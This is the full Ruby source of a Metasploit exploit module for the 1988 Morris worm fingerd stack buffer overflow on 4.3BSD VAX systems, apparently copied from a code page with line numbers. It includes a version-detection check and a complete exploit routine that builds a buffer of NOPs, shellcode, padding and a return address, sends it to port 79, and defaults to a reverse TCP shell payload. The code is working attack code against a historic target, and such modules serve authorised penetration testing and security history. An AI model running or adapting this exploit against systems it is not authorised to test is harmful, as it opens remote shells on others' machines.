1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking # This is so one-off that we define it here ARCH_VAX = 'vax' include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name'=> 'Morris Worm fingerd Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in fingerd on 4.3BSD. This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg. }, 'Author'=> [ 'Robert Tappan Morris', # Discovery? Exploit and worm for sure 'Cliff Stoll',# The Cuckoo's Egg epilogue and inspiration 'wvu' # Module, payload, and additional research ], 'References'=> [ ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'],# Analysis ['URL', 'http://computerarcheology.com/Virus/MorrisWorm/'], # Details ['URL', 'https://github.com/arialdomartini/morris-worm'], # Source ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup # And credit to the innumerable VAX ISA docs on the Web ], 'DisclosureDate'=> 'Nov 2 1988', 'License' => MSF_LICENSE, 'Platform'=> 'bsd', 'Arch'=> ARCH_VAX, 'Privileged'=> false, # Depends on inetd.conf, usually "nobody" 'Targets' => [ # https://en.wikipedia.org/wiki/Source_Code_Control_System ['@(#)fingerd.c 5.1 (Berkeley) 6/6/85', 'Ret' => 0x7fffe9b0, 'Payload' => { 'Space' => 403, 'BadChars'=> "\n", 'Encoder' => 'generic/none', # There is no spoon 'DisableNops' => true# Hardcoded NOPs } ] ], 'DefaultTarget' => 0, 'DefaultOptions'=> {'PAYLOAD' => 'bsd/vax/shell_reverse_tcp'} )) register_options([Opt::RPORT(79)]) end def check token = rand_text_alphanumeric(8..42) connect sock.put("#{token}\n") res = sock.get_once return CheckCode::Unknown unless res if res.include?("Login name: #{token}") return CheckCode::Detected end CheckCode::Safe rescue Rex::ConnectionError => e vprint_error(e.message) CheckCode::Unknown ensure disconnect end def exploit # Start by generating our custom VAX shellcode shellcode = payload.encoded # 0x01 is NOP in VAX-speak nops = "\x01" * (target.payload_space - shellcode.length) # This overwrites part of the buffer junk = rand_text_alphanumeric(109) # This zeroes out part of the stack frame frame = "\x00" * 16 # Finally, pack in our return address ret= [target.ret].pack('V') # V is for VAX! # The newline is for gets(3) sploit = nops + shellcode + junk + frame + ret + "\n" # Fire away print_status('Connecting to fingerd') connect print_status("Sending #{sploit.length}-byte buffer") sock.put(sploit) # Hat tip @bcoles rescue Rex::ConnectionError => e fail_with(Failure::Unreachable, e.message) ensure disconnect end end |